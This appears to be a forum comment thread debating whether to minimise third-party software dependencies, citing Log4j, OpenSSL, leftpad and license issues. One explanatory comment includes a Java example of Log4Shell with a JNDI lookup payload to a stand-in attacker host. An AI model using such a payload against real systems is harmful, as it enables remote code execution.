Cull your dependencies
tomrenner.com

I don't think there's an issue with depending on libraries that are big. If the library is just a big bag of classes from which you cherry-pick the ones you need, then the extrapolation on the number of bugs mentioned in the article under "By the numbers" is meaningless. Why care about bugs in code you don't use if it doesn't even end up getting linked into your program? In modern languages like Go or Rust, the toolchain will most likely not even compile the code you don't care about, assuming it lives in separate packages/modules.
What's a lot more problematic is if you use libraries that don't allow easy cherry-picking. For example, Log4j has a very simple API à la log.print(), but that thing almost acts like a portal into another universe. Strings can contain a whole bunch of modifiers or tags, enabled by default, that cause the library to do many special things. Those libraries are just in poor taste.
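To make that concrete with the Log4Shell case: before the 2.15/2.16 fixes, Log4j expanded ${...} lookups inside logged messages, so attacker-controlled input could trigger a remote JNDI fetch. A hypothetical handler like this (class, method, and header names are illustrative) was all it took:

    import org.apache.logging.log4j.LogManager;
    import org.apache.logging.log4j.Logger;

    public class LoginHandler {
        private static final Logger LOG = LogManager.getLogger(LoginHandler.class);

        void onFailedLogin(String userAgent) {
            // Looks like plain logging, but vulnerable Log4j versions scanned the
            // formatted message for ${...} lookups, so a User-Agent header of
            // "${jndi:ldap://attacker.example/a}" caused a remote class fetch.
            LOG.error("Failed login, user-agent: {}", userAgent);
        }
    }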
Don't be so sure. Large libraries often aren't well separated, so you end up not being able to strip as much as you intend (unless there's an explicit design goal, somehow enforced, to keep things in isolated components). If you can't strip, there's a dependency somewhere, which means you may end up exercising code you didn't intend to. Log4j is an extreme example, and generalizing from it to all libraries is bad engineering, but paying attention to dependency graphs is a good idea, even if people will continue to ignore the problem.
OpenSSL is everything-and-the-kitchen-sink feature creep. Its development and architecture methodology are practically nonexistent.
Heartbleed, Spring4Shell, Logjam, Struts, Jetty and many more beg to differ.
More LoC is always a greater attack surface, regardless of development trustworthiness.
Minimize code ruthlessly.
The corollary to "Minimize code ruthlessly" is "Roll your own X". Sure Heartbleed was bad, but are you going to write your own TLS library?
IMO, the OP post has an unfounded sense of hubris. Everyone else's code is bad except for me, who only writes minimal code with no exploits.
Libraries are generally larger because they are usually written for more use-cases. If your program is only referencing a small portion of a library, then rolling your own doesn't mean rewriting the library. Your code will be more minimal because it's only written for your program.
Assuming you're fallible and write code with exploits like everyone else, your program will probably have different exploits from mine. An attacker won't be able to target a widely used library and enjoy being able to pick from several targets. Instead, they'll have to tailor an attack for your code base. Each exploit found yields less of a reward, which will frustrate less motivated attackers.
This comment inflates the upside (that every developer reinventing the wheel lowers the chance of an attack on their particular code succeeding) and discounts the downside (the increased costs that come with eliminating the specialization and consolidation of code into reusable libraries).
> Instead, they'll have to tailor an attack for your code base.
This misstates the actual threat.
Assume detection of exploits is automated (even if it isn’t completely automated now). Assume exploit code is modularized and passed around on hacker markets, because it is.
Your recommendation only increases the cost to exploit by a small factor, but it also increases the costs of legitimate usage by possibly a much larger factor (patching the bugs that are inevitably found). Because developers aren't specializing (in how to efficiently and safely write logging code), there will be more bugs in both the design phase and the implementation phase than in a counterfactual world with specialization.
This is just security through obscurity. It's no different than skipping password hashing because you think you are too small to be attacked (after all, you can minimize one more dependency). It works up until the point your business is actually worth anything.
Libraries are not only larger because they are written for more use-cases, but also because they cover more tested edge cases.
> The corollary to "Minimize code ruthlessly" is "Roll your own X". Sure Heartbleed was bad, but are you going to write your own TLS library?
But using "don't roll your own crypto" doesn't generalize to using every possible library to avoid writing any code. Down that path lies the madness of leftpad.
Crypto and security protocol implementations are exceptionally difficult to write in a way that avoids all exploits, so, yeah, don't write your own TLS library unless you're willing to fund a team of all the necessary experts which is going to be very difficult.
OTOH a very large number of libraries implement simple things in overly complex ways (sometimes by necessity because a library needs to try to be all things for all people) and can be very easily replaced by small amounts of code that do only what my product needs.
Every third-party library you add is an additional source of bugs, unmanaged surprises (e.g. they decide to break their APIs for the lulz), attack surface, and constraints. It is wise to weigh the benefits against the drawbacks for each library individually before making it part of your code.
My counter-point is twofold. Everyone understands not to roll your own crypto, not because developers intrinsically know crypto is hard, but because of sustained marketing by cryptographers. It's an easy counter to point to when people swing too far into NIH. Following that, I think a lot of people don't realize when they are in over their heads; it happens a lot in software estimation. It's easy to look at something like logging and say "I can just write printf, why does logging-library-x have so much bloat" without realizing how complex a good logger can get. Software architecture is judged by how easy it is to maintain over time; what is a small amount of code today can easily balloon into something unmanageable.
At the same time, there's a lot of hubris that goes into the statement "Every third-party library you add is an additional source of bugs, unmanaged surprises", but somehow the code you write was typed by God himself.
Everyone points to the leftpad madness of dependencies despite the fact that the dominoes leading up to leftpad were the work of one very dedicated individual. Other languages with the same kind of simple dependency management (like Ruby, on which npm was based) have never had anywhere close to the same issue. Regardless, the OP doesn't use leftpad as an example; he uses log4j. I agree that log4j had insane defaults, and that's on the maintainers, but the implication is that you should roll your own logging facade, and that's something where I wouldn't want to work on a project where all the logging is done through printf (except in probably an embedded environment) or maintain an in-house logging library because the original writer thought it would be "just small amounts of code".
> At the same time, there's a lot of hubris that goes into the statement "Every third-party library you add is an additional source of bugs, unmanaged surprises", but somehow the code you write was typed by God himself.
You (everyone) shouldn't allow hubris to drive these decisions; instead, make an objective evaluation.
If you're going in saying "I can write this same functionality better than anyone else so I'll just do it", stop and rethink.
Every line of code (to an approximation) adds more potential bugs. So if you pull in a library with a million lines of code, you've added that order of magnitude of possible future bugs. If you actually need most of those million lines because you use all the features, then you need them. In that case it would be hubris to assume that you can write the same but slightly different million lines and do much better. You can't.
But as other subthreads here point out, often you really use something like a thousand lines out of that million-line library. If that's your use case, you can reduce your attack surface by 999,000 lines of code by writing a few functions of your own, customized to your needs without any unused frills. You don't need a god on your staff, just someone who values the reliability and security that simplicity brings.
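As a concrete, if clichéd, illustration (a sketch in Java rather than a drop-in for any particular npm package): the whole of a leftpad-style dependency collapses into a few lines you own and can read in one sitting.

    // Pad a string on the left to the given width: the entire "dependency".
    static String leftPad(String s, int width, char pad) {
        StringBuilder sb = new StringBuilder();
        for (int i = s.length(); i < width; i++) {
            sb.append(pad);
        }
        return sb.append(s).toString();
    }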
> unmanaged surprises
To unpack this statement, I meant that when using a third party library you are now subject to their schedule and roadmap over which you don't have any say or ability to manage it. They might drop a feature you need, or break APIs in a minor release, etc. This is undeniably true, so must be taken into account when doing a risk analysis on depending on some library. Well-run libraries offer a stable platform but tons of libraries are not well-run from a release engineering aspect. Choose carefully and know what you're getting into.
"Don't use OpenSSL unless you absolutely have to. Preferably, disable every other feature you don't need. And keep all of your vendored dependencies up-to-date."
He's not comparing quality, as much as quantity. Building a small utility function, general enough for your intended use, brings in less code than adding a library dependency. That's the argument.
TLS is an example of when you probably would not make that trade-off, but there are lots of other examples where it would make sense.
Sure, but the parent post is about logging, which isn't a small utility function. `printf` works for scripts up until it doesn't. When you start needing structured logging and log levels, and you're debugging performance issues caused by logging, you start to understand why that complexity is there. Leftpad? Sure, that's extraneous. But logging?
Yes, of course. Unless you absolutely have known working pristine code free of side-channels for SHA3, ChaCha20-Poly1305, etc. don't even think about it.
The same goes for parsing and other complicated operations containing pitfalls.
Honestly, I wish most crypto, parsing, and numerics libs, and OS kernels and drivers, were rewritten in Rust and given C, C++, etc. interfaces.
The intended way to look at this is, “When I write code, I know what I wrote and the processes in my team (should) ensure other teammates know it as well”.
But what’s the back pressure to this advice? If I need to multiply matrices should I write my own to avoid including MKL BLAS? What’s the heuristic that determines when a dependency is worthwhile?
I once wrote a matrix multiplication lib because I had some a priori knowledge about the data and could remove half the operations.
Everything has a cost (usually in time) and everything comes with trade offs (usually a different set of bugs). Not-invented-here comes with a gigantic upfront time cost and a larger set of bugs. The best heuristic depends on what you’re optimizing for. There’s never an easy answer.
As usual, it depends. A naive matrix multiplication function is pretty simple. If that's all you need and can do with sub-optimal performance, I'd write my own.
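For illustration, the kind of "naive but sufficient" version being described might be nothing more than this (a sketch assuming plain double[][] matrices, with no blocking, vectorization, or shape checks):

    // Naive O(n^3) matrix multiplication: returns c = a * b.
    static double[][] multiply(double[][] a, double[][] b) {
        int n = a.length, k = b.length, m = b[0].length;
        double[][] c = new double[n][m];
        for (int i = 0; i < n; i++)
            for (int x = 0; x < k; x++)
                for (int j = 0; j < m; j++)
                    c[i][j] += a[i][x] * b[x][j];
        return c;
    }

If you later discover you do need BLAS-level performance, that is the point at which the dependency earns its place.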
It’s less about lines of code and more about scope of functionality.
> Minimize code ruthlessly.
Minimize functionality ruthlessly.
> More LoC is always a greater attack surface
More… than what? What does the counterfactual look like?
If I only care about 1 application in a vacuum, reducing LoC is not terribly difficult. If I run my application on any modern OS, I depend on thousands of applications, daemons, libraries, and a kernel. I would far rather their developers take reasonable efforts to import common libraries when appropriate. The aggregate LoC of an ecosystem is more important than the LoC of a single application.
Also, telling people the metric of relevance is LoC is wrong and will lead people to game the metric, losing sight of the actual goal of code quality. There are infamous examples of Perl code golf; they optimize for LoC, but aren’t at all useful for code quality or security.
Far better to expand LoC a reasonable amount in favor of developer readability and to reduce complexity.
I'll say the quiet part out loud: nobody got fired for using a dependency with any of these bugs, and nobody got promoted for not doing so.
Obviously, pulling in something like left-pad is worthy of derision. But generally you should pull in whatever dependencies let you go faster, and minimize the amount of time spent planning for black swan events.
> Why care about bugs in code you don't use if it doesn't even end up getting linked into your program?
If things are segmented in ways such that you can automatically tell that you're not impacted by a bug, cool.
A lot of log4j emergency deployment pain in BigCos had to do with the limitations of tools that could discern whether you weren't impacted, because security vulnerabilities of that magnitude aren't an area where "probably not" is good enough. I wouldn't really be comfortable with "it's fine that my <bank/surgeon/cloud provider> uses a framework with massive unpatched vulnerabilities, they're very careful to hand-pick classes to import that are safe".
(modulo the security of real world banks/surgeons being, uh, less than ideal, and all of my PII probably being accessible from some wordpress endpoint somewhere)
It would be nice if there were a way to quantify the value of your dependencies.
If you have a dependency with 1,000 LoC and your application is utilizing 800 of them, that seems like a good reason to use the dependency.
You're (hopefully) getting unit tests, documentation, and public exposure of the code (bugfix opportunities) for "free"
If you have a dependency with 1,000,000 LoC and you only need 1,000, that indicates the dependency isn't a good fit for your project.
This is only a heuristic, but are there any tools that examine metrics like that?
This makes me think about the quality of the dependency. If you could evaluate packages for things like:
* Test coverage -- that's not a metric on NPM
* Code practices -- what's the review history?
* Issue velocity -- a hard metric; lots of features vs. fixes
* Hygiene -- for many languages, is typing enforced / validated?
I'm sure there are lots of other metrics, but so many times you're just evaluating two packages based on "star count" or "npm installs".
Agree that this is the largest issue with code quality.
Knowing when and which package to import, given the incomplete data points we have now.
Stars/downloads are a popularity contest. At some point, people mostly vote for the candidate who is most likely to win (causing this to be self-reinforcing), not the one with the best ideas.
The stability and sustainability of the development team, and the signals of consistent quality (e.g. code linting, code quality audits, bug bounty program participation, public security audits, good design documents, build automation, testing methodology and test coverage).
Factors for me are:

1. How hard will it be to remove/replace this package in the future? How much coupling does it introduce?
2. How likely will it be that this is deprecated/unmaintained in the future?
You're also exposing yourself to potentially needless breaking changes, and to libraries that aren't well tested or don't have static types. Or to libraries growing in size because of optional dependencies, when your build tools and language have no built-in support for keeping unneeded optional dependencies out of the imported code.
This seems like an ecosystem cultural problem. In Python, I can't think of a single time I have experienced an "uncontrolled" breaking change (i.e. without an announcement and long deprecation period) in any important library that wasn't in some kind of alpha state, and I've never needed to rely on an alpha-quality library for anything in production.
It's not a way of detecting it but what about dead code elimination, like Javascript's tree shaking [1]?
Of course, if your dependency is spaghetti, tree shaking wouldn't do much, but neither would an analysis tool. Poorly architected code with no separation of concerns will cause every entry point to touch every LoC.
[1]: https://developer.mozilla.org/en-US/docs/Glossary/Tree_shaki...
Tree shaking could help, but an issue is that in bigger libraries there will often be shared abstractions that wouldn't be present in a more targeted implementation. Even libraries that are well architected and have good separation of concerns.
Unless the library is a collection of independent functions like lodash, there will be some interdependency (in the name of code quality!).
Of course, (ab)using "more targeted implementations" can cause other problems, like using too many libraries for example. No silver bullet.
How much time would it take to replace those thousand lines? A week (assuming well tested and production-ready is a requirement)? If keeping it costs a couple hours of debugging once a month, the return on that week would take years to turn positive.
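(Roughly: a 40-hour week of rewriting versus about two hours of debugging per month means 40 / 2 = 20 months, so nearly two years before the rewrite pays for itself, and that assumes the rewritten code needs no debugging of its own.)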
> This is only a heuristic, but are there any tools that examine metrics like that?
Use a code coverage tool to see what call paths are getting exercised.
Wow okay I'd be highly interested in such an analyzer as well.
I think a lot of naysayers here are missing the point:
> The underlying Log4J library is 168,000 lines of code.
I would find it difficult to invent a logging system so exotic, even if somebody paid me to. People are ignoring the incredible size of their real footprint. My 4000-line microservice is actually my 3,000,000-line macroservice and every single one of those lines is a potential trouble spot for security bugs and myriad other issues - memory issues, startup issues, compatibility issues, on and on...
In fact I would argue that confusion about exotic open source frameworks leads to wrong assumptions in which people figure "oh I think the framework takes care of that" when in fact they have a massive problem they don't understand. Even when the security bug is documented it's incredibly hard to figure out which releases are affected, which releases are fixed, and so on - of course it shouldn't be, but it always is.
You can try to argue that "I'm only using this one part and I should be excused!" but that never works in practice. One function call can traverse the world before returning. Many frameworks quietly do all sorts of things during bootup without one's knowledge - it's sometimes mystifying how the dang thing managed to wake itself up and unleash havoc in the first place.
The counterfactual might suffer from Chesterton’s Fence. If you don’t know why the framework implemented “all sorts of things during boot up without our knowledge”, why do you believe that you wouldn’t need to do something similar if you were to rewrite similar code?
The core problem is the knowledge handoff of a library/ framework maintainer. An end user should be able to identify whether the library gives them enough specialization value or whether substituting it for a little elbow grease is “worth the squeeze”. In practical terms, it is always an unknown and depends on the quality of the end developer x the complexity of the task.
> The counterfactual might suffer from Chesterton’s Fence. If you don’t know why the framework implemented “all sorts of things during boot up without our knowledge”, why do you believe that you wouldn’t need to do something similar if you were to rewrite similar code?
I really hate those thought-terminating clichés HN loves to drop from time to time. If your Chesterton's Framework (or library) is doing anything important at all during boot (or at any time, really), it should be very well documented or extremely obvious; otherwise it's a huge security risk, period. "Random Chesterton Fence shit happening" is how we got Heartbleed (did we really need the heartbeat?). It is how we got Log4Shell (did we really need arbitrary access to servers?). It's how we still get lots of weekly WordPress CVEs.
About the "rewrite" part: the irony is that people who would be able to "rewrite similar code" are the ones who do actually know what frameworks do during initialisation. Notice that I said "be able" instead of "dare". That's because actually writing this kinda code is non-trivial and requires previous knowledge and study.
The scenario where a person is actually able to rewrite an important part of a framework that is actually production-ready without knowing what it entails beforehand is completely unrealistic.
The story of the mythical cowboy coder that managed to accidentally reimplement Rails at work is just that: a myth. What the mythical cowboy coder most certainly created was a simulacrum of a Framework. It probably has lots of useless OOP patterns, but deep down he's using Sinatra's router, and his "ORM" (if it's really an ORM) is just a wrapper around ActiveRecord. Why? Because writing a Router and an ORM are hard. Faking structure not so much.
It's frankly tiring that lots of people jump to those absurd arguments to defend the abuse of third-party dependencies as if they were manna from heaven made with the utmost care. They're not; we have to be realistic: lots of them are absolute shite.
I was immediately reminded of this gem from https://www.joelonsoftware.com/2001/10/14/in-defense-of-not-...
“You know their motto? ‘Find the dependencies — and eliminate them.’ They’ll never go for something with so many dependencies.”
> If you have customers, never outsource customer service.
Hopefully, every business has customers?
Yes, exactly. That’s the point.
I think that’s the joke.
Yeah, after the two comments from you I re-read it and finally got the punch line :)
It's good advice, but it has a cost. Where is the discussion about cost?
The product with fewer dependencies will live longer and give you better flexibility, but it will cost more to build and more to maintain (incl. onboarding new engineers who need to learn their way around your custom stdlib+). It's a balanced choice, but the stakeholders are not prepared to invest more. Furthermore, if the project gets cancelled, all of that library-code investment will be sunk.
It's not that '... developers ... are lazy, and prefer to write as few lines of code as possible, sticking rigidly to the principle of "not reinventing the wheel"'.
They don't do that because they are lazy. They do that because of competitive pressure. In SW development, in most cases, particularly in enterprise development, "the fastest person wins". Whoever moves fast and delivers fast will get to do more projects and have more influence over direction of projects. "Not reinventing the wheel" is of course in vast majority of cases faster than reinventing it.
Because in most cases it's not important to write the best possible code, it's to write "good enough" code, on time and on budget. Insecure code is of course not "good enough", so competitive pressures will adjust accordingly.
That’s assuming you move faster with a given dependency and that there isn’t some non obvious mismatch between it and what you try to accomplish.
Reinventing the wheel is also decidedly unfulfilling.
“Fulfillment” in a developer’s programming tasks is not a valuable work product. Choosing whether to reinvent the wheel or not is ultimately a business decision that too many developers internalize.
If your product team and management team are blindsided by tech debt or liabilities that you add to the code base because you decided to quietly roll your own crypto (or any other OWASP vulnerability), you are substituting your short term enjoyment for the livelihoods of your coworkers.
Companies who make their developers do stuff they feel is pointless will not see all that much "valuable work product" either.
There's a natural bias to prioritize near-term cost over long-term cost, which translates into a bias to just add yet another dependency. The advice is therefore to be aware of that bias and to actively counteract it. Of course, the involved trade-offs need to be considered to strike a good balance. If the stakeholders don't enable you to strike such a balance, personally that would be an important reason to quit that situation, or to take care not to get into it in the first place.
Not everybody thinks that maintaining your own code is eventually cheaper and safer than adding a mature dependency.
Nobody said that it would. You’re putting up a straw man.
> will cost more ... to maintain
This is a reasonable and popular intuition, but for an enormous class of projects it turns out to be torturously false and a poor reason to choose dependencies.
How many times have you sat down on Monday to fix a bug in your product only to discover DoohickyLib 3.3.2 is no longer building correctly with the toolchain update that you just pulled in. So now you go to DoohickyLib's github page to see if it's been addressed yet.
You find that someone else reported the issue last week but the maintainers use a different toolchain themselves, and don't think this is a priority, and so they pushed back on the reporter to submit a PR if it's important to them.
Unfortunately, the reporter isn't experienced at contributing to open source and doesn't want to contribute. After a bunch of other people post "me too! when is this getting fixed?", some generous soul finally contributes a PR that should do the job.
But the maintainers are on vacation, or just sick of this issue, and don't respond. Finally, they reappear but aren't satisfied with the PR, so they push back on the contributor. In the meantime, that contributor has transitioned to their own fork and isn't tracking the issue anymore. So the issue has been open for a week and has 30 posts, and somebody shared a functional fix, but it still isn't merged and DoohickyLib still doesn't work with the toolchain you use.
It's now 1pm on Monday and you've spent most of the day trying to track down the issue and understand its status. You think about whether you can table this work until later in the week, hoping that the fix gets merged into the mainline of DoohickyLib, or whether you should switch to a fork. But there's a lot of overhead to that, especially if you're on a team and need to run those kinds of ideas past a PM.
Blah, blah, blah, etc, etc, etc
This is what "maitenence" tasks look like when bring dependencies into your project. They're not really related to your project, they're not really something you have good control over, they don't feel like engineering, they often come up out of nowhere, and they're often showstoppers.
The truth is that it's very hard to anticipate where your maintenance burden will come from, but when you choose to use a lot of dependencies, you're not necessarily reducing that burden; you are, however, making a profound choice about what it looks like.
Very much this. An external dependency gives you the free puppy, but the ongoing work is still yours.
One of the items, as you describe, is that external dependencies introduce unpredictable change on a timeline which is entirely out of your control.
A particularly annoying example that has happened many times: there is an exploit in library A which is now fixed in the latest version, so we must upgrade. Oh, but the latest version also bumps the dependency of some other library it uses to a version that removed a key feature we need. Infosec says you must fix the vulnerability immediately, and of course the product team isn't willing to compromise on the feature loss. Oops. When you own the code, you own these decisions.
Of course, some library projects are run very professionally and maintain a strict observance of compatibility within major releases, a long deprecation announcement process and so on. Other library projects, not so much. Definitely favor depending on the first kind and avoid the second kind.
> but for an enormous class of projects
> with the [latest] toolchain update that you just pulled in
In my experience, larger projects tend to be VERY conservative with toolchain updates. For example, I have Java JDK 8 (2014), 11 (2018), 17 (2021), and 18 (2022) installed; the larger projects are on JDK 11 or are just migrating from JDK 8 to JDK 11. Newer, smaller projects are on JDK 17, and only experimental projects use JDK 18.
> Unfortunately, the reporter isn't experienced at contributing to open source and doesn't want to contribute.
One more reason not to chase bleeding edge but to stay on LTS instead.
Bottom line, I am not removing Google Guava or Apache Jena from my projects because of a few CVEs they may have every few years. I am not sure I will write more secure and maintainable code. And even if I did, would the stakeholder really benefit from that?
And it will cost vital time to market. I am very conservative about introducing dependencies but there is a reason why they are proliferating and it is not just developer laziness.
Here’s a very good take from Joel Spolsky:
https://www.joelonsoftware.com/2001/10/14/in-defense-of-not-...
Not everyone has the resources of a Microsoft, though.
I agree that for core parts it matters. But quoting the post by Joel:
"If you’re developing a computer game where the plot is your competitive advantage, it’s OK to use a third party 3D library. But if cool 3D effects are going to be your distinguishing feature, you had better roll your own."
There’s also a cost to using an external library. For example bad maintainers, project being abandoned, project having breaking changes, dependency ballooning in size.
It is an optimization problem, and any strawman argument based on the alternative endpoints will be flawed.
It is also very difficult to measure the mitigation of issues you get by reducing dependencies and your exposure to their issues. If you try to measure it, you'll wind up only seeing costs, and you'll wind up using all kinds of dependencies right up until you see how hard it is to maintain your own CI, and then you eventually get log4j'd.
> It's a balanced choice but the stakeholders are not prepared to invest more.
Well, that's not what "balanced" looks like.
Anyway, a lot of quality-driven activities pay off well within the initial development of a project, in which case it's not a balanced choice anymore; it's a complete no-brainer. Still, I have yet to see money-oriented stakeholders accept those.
Build & support vs. buy or use
The cost of maintaining and supporting beyond simple cryptographic primitives is too steep for most projects.
Having been burned early having to support an application with rotting dependencies, I tend to feel this. In my Python applications, I make an effort to use the standard library solutions over third-party ones whenever possible, even when they might not have all the features I want. There are however occasions when I must use third party dependencies, and some of them give me hell (e.g. dependencies that refused to install with a simple 'pip install X')
It is a fine balance. Good luck doing that in JS which has zero standard library on the browser.
C#, for example is in better shape and you can do a lot before you reach for nuget for anything outside of Microsoft.
I prefer to not import tiny libraries but adopt the code into the codebase.
> Good luck doing that in JS which has zero standard library on the browser.
The article is saying something more like vendor your dependencies (and cut out the stuff you don't use within dependencies).
> I prefer to not import tiny libraries but adopt the code into the codebase.
Yep that's what the article is saying.
I don't get why people find vendoring valuable. If you vendored log4j, you'd get the same exact bug in your vendored version, and you'd need more work to pull in the fix.
Perhaps people imagine that if they vendor they'll review all the code they pull in, but I've never seen it happen in practice beyond "LGTM". It wouldn't have found the log4j vulnerability, and could overlook even intentionally malicious code if only the source looked innocent-enough at the first glance.
Why are so many people using log4j or any complex logging library in the first place?
If it weren’t for C#, we’d have a much harder time doing business with our banking customers.
When it comes to vendor due diligence time, we only have to write a single 3rd party’s name into that box. Every one of our customers mutually trusts Microsoft too.
We’ve been at it for over 7 years now and we still only “depend” on Microsoft. Even stuff like SQLite falls under the Microsoft.Data.* scope these days.
The browser has one of the most extensive standard libraries out there.
> JS which has zero standard library on the browser.
Could you explain what you mean by a standard library or by zero? :-) Or, more to the point, what are the specific things that you would add to JS standard library that you find missing in the browser?
Consider the latest release of an evergreen browser as a reference point.
(I know about date manipulations. This should be addressed by the Temporal proposal that's already at stage 3. What else?)
The problem is that when you write the functionality yourself, you’re likely to be subject to the same number of, if not more, bugs per 1000 lines as mentioned in the article, especially if the project has a deadline to meet. Using unnecessarily bloated libraries might be a bad choice, but in general I think it is indeed a good practice to use libraries that are widely adopted and well rated in the community.
Also not sure if the Java world and JS world are that different to the rest, though in the community of Elixir which I work with, “bloated” libraries are practically nonexistent, which I think should be similar for most functional languages.
The first thing I look for when starting a new project, if I can't be served by the standard library of whatever language I'm using, is dependencies that don't themselves depend on a bunch of code that I will have to indirectly depend on. The code I wrote like that still runs, ten years later, without many problems updating it. The code I worked on that depended on whatever flavor-of-the-year framework people were hyped about for no good reason is rotting.
Absolutely. This is where the real dependency bloat in ecosystems like npm come up. You may only include a handful of reasonable dependencies, but each of those have dozens of their own dependencies, and so on and so on.
This is true for [probably all] frameworks? If I develop a microservice using Spring Boot, dependencies are inevitable.
However, I think the blog post reflects a strong desire of many developers (I am one of them.) Achieving this vision, at least in commercial software, can be a utopian dream.
I'm super allergic to the nodejs ecosystem, it's so bad.
I also get away in my professional life using it for pretty much nothing and it's great. There's a reason Ryan Dahl moved on to Deno.
People who think it's somehow necessary or integral to getting a website going are deluded hypebeasts.
I think it's missing a bit of nuance.
Dependencies can be very good, they can provide enormous leverage to actually solve your problems and share the burden of common problems like parsing a json string or compressing to gzip or whatever. In theory at least.
On the other hand, I think a large part of the problem actually comes from dependency managers being a bit too good. It's easy to pull in some library and not realize the dependency has a massive root system of transitive dependencies, and once that gets settled in your code base it may be difficult to get out.
I think the real problem isn't dependencies themselves, but the expectation that dependencies will have dependencies of their own. I don't think what you get in the end is good, robust software. It gets a sort of flimsy quality where stuff keeps breaking and falling apart, and that's just the way it is.
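For what it's worth, most package managers will at least show you that root system before it settles in; a few commands from the respective ecosystems' standard tooling:

    mvn dependency:tree     # Maven
    gradle dependencies     # Gradle
    npm ls                  # npm
    cargo tree              # Cargo (Rust)
    go mod graph            # Go modules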
Dependencies for areas I have no knowledge, experience, nor desire to learn are no vice.
Dependencies where I know the domain are borrowed time (sometimes with bombs attached) with mild virtue.
If hell is other people, debugging other people’s code is double-dog hell. Triple-dog hell if they’re unresponsive or in a significantly different time zone.
Not only for security reasons: anybody who has ever maintained a large codebase with external dependencies for long enough knows the pain of handling breaking changes in the underlying libraries without breaking your own public APIs. Sometimes you even have to embed multiple versions of a library to still be able to use its legacy elements. So yeah, 100% agree that each dep should be scrutinized.
The truth is that the world generally doesn't give a shit about software quality. Developers are expensive and business models shoddy. You have to be quick, otherwise the competition makes the race.
I for my part have given up and go with the flow. Who cares if Hibernate creates a million queries in the background. Hey, it works, so ship it!
Is the health safety and wellness of your user base important to you? "Who cares" matters when your userbase gets fucked over because you didn't.
To us developers, maybe. To our managers? Definitely not. As long as the GDPR fines are cheaper than the alternative, no one will care.
I'm really glad I don't work in a company like that.
"Invented here syndrome" is a real and pernicious problem.
I think it probably depends on the size of organization.
NIH is a problem in old and large organizations, which actually have a large roster of homegrown solutions.
On the flip side, I feel a lot of smaller organizations have the opposite problem, like a weird phobia against nontrivial code. Like you need a special license to implement a bespoke data structure or some graph algorithm.
Applying a blanket rule like this is always wrong. It makes sense in prototyping to have a good mix of pull-vs-make. Make the small things that are easy to do, and pull the things that make you more productive, even if they are huge.
Maybe during maturation, each dependency should be "vendorized" as much as possible. Fork it, find an internal maintainer. I suspect that very quickly nobody will want to pull in a lot of dependencies any more, and miraculously a much smaller, much more specifically-suited codebase will appear to solve the very small subset of problems you actually need to solve right now (rather than all problems the dependency could solve).
But ultimately: "If it’s a core business function — do it yourself, no matter what."
The assumption of 15-20 errors per 1k lines of code can't hold for the most-used libraries. Incidents like the Log4j mess are memorable because they are rare. I bet people have been crawling all over similar logging libraries for other platforms now, looking for similar problems.
Good luck not adding dependencies. What's the alternative? Maybe some of the dependencies can be avoided without cutting functionality. But really only by two methods: Either there is already another dependency doing the same work, or you implement it yourself. In the latter case, chances are that the code will be less mature.
One other area that can be complicated surrounding dependencies is licensing. Specifically, you use a library imported from PIP/NPM/Maven/NuGet/etc. and maybe, if you are a diligent dev, you review the license. If you're lucky it's MIT or some other compatible version for your use case. But did you review the dependencies of this new dependency? What about their licenses?
Okay, now fast forward a few years: is the open source dependency still [original license flavor], or is the license now more restrictive? What about the updated dependencies of this single, imported dependency?
Now suppose you have an executable that's made available: do you properly have the accompanying license files that (at a minimum) give attribution?
Generally speaking, we import dependencies to help make things better and to get back to focusing on the main portion of our application. At the same time, each imported dependency has an ongoing management factor.
...and don't get me started on the diamond dependency problem which still exists despite any given package manager's best efforts and is one of the reasons we have SemVer which we hope is followed by the developers of that dependency.
Rather than reviewing any licenses, you should incorporate a license check in your build. I did this in a Gradle project recently, and it was pretty easy:
https://hg.sr.ht/~twic/lambda-property-matcher/rev/53ef7eb30...
Why make it so difficult? Just make your project AGPL and stop worrying about other OSS license compatibility.
Because i'd like my software to be useful to normal people.
Because AGPL implies many things not all developers want associated with their project?
Yes, due to their virality, GPL-flavored licenses tend to be the "top type" that you can just cast the top-level project to and call it a day, but try convincing your corporate boss to AGPL your money-making product. That's gonna go about as well as is predictable.
Then that's not the company you want to work for.
AGPL isn't even compatible with GPLv2, so you still have to worry about OSS license compatibility. So given that you have to worry anyway, you might as well pick a less obnoxious license.
I think culling dependencies is smart, but the selection of which to cull (or at least consider) is a high art.
Does this dependency generate a lot of vulnerability issues? How stable is it? If it has a high change velocity, how stable is the API or whatever portion you use?
At a previous job, someone was advocating for this repository software which I shall not name. I did a Visio diagram of all of the major things on which it depended: Solr, Ruby on Rails, and so forth. It looked like the Tower of Babel. I then colored in the blocks of this tower whose projects were written in a programming language we didn't have expertise in.
Well, they went with it anyway. The job is in the rearview mirror but consultants continue to work on this project.
Frankly, the dependencies in the project alone were enough that one would need a reasonably-sized team to even consider it, much less the paltry number of bodies we had to throw at the problem in the middle of all of our other tasks. Don't get me wrong -- you can build amazing things by stacking together predefined blocks, but life is always going to try to Jenga that tower you have created.
> When a new package is added to the codebase, demand full justifications about why it is required, and record the reason for the addition in a log within the repository.
I think this is actually a good tip that doesn't get used enough. Logging dependencies and packages would probably also make it a lot easier to debug if you suspect a package is the source of a problem but don't know whether you can touch it or not.
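A hypothetical entry in such a log (the file name, fields, and package are all illustrative, not something the article prescribes) could be as simple as:

    # deps.md
    2022-03-01  com.fasterxml.jackson.core:jackson-databind
      Why: JSON (de)serialization of API payloads; no stdlib equivalent.
      Used by: the http-api module only.
      Alternatives considered: hand-rolled parser (too many edge cases), gson (less team familiarity).
      Revisit: at the next major release.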
Likely worth a read for those that found this interesting is Russ Cox's article on dependencies, Our Software Dependency Problem, at https://research.swtch.com/deps. This post is a bit more detailed and balanced in my opinion.
> which at a conservative estimate gets us to 1M lines of code in the imported packages. This is roughly the size of an entire operating system.
Operating Systems are way bigger than 1M lines of code. Even in the link he gives, the smallest "OS" is 2.4 million lines, and that's actually the Linux kernel from 2001. The true smallest OS is Windows NT in that link, at 5 million lines of code iirc.
Don't make false comparisons. An operating system hasn't been anywhere near 1M lines of code for almost 30 years. They are now over 500M lines of code! The kernels alone are way larger than 1M lines of code. If you're going to make a comparison, use a real comparison instead of making stuff up and then providing a link that immediately disproves you.
There is always balance with reinventing the wheel. Plus, a custom library often gives way more technical debt than a standard one. Less battle-tested, fewer tutorials, very often a lot of idiosyncrasies.
A few times, we went a different route:
We use libraries as needed, but after some time we prune the ones from which we used only a few functions/classes. That way there is (almost) no delay in development, but there is a process to keep things clean.
The converse is much more challenging: writing a lot of code and then discovering you are effectively reimplementing an existing library that took quite a few person-years to build.
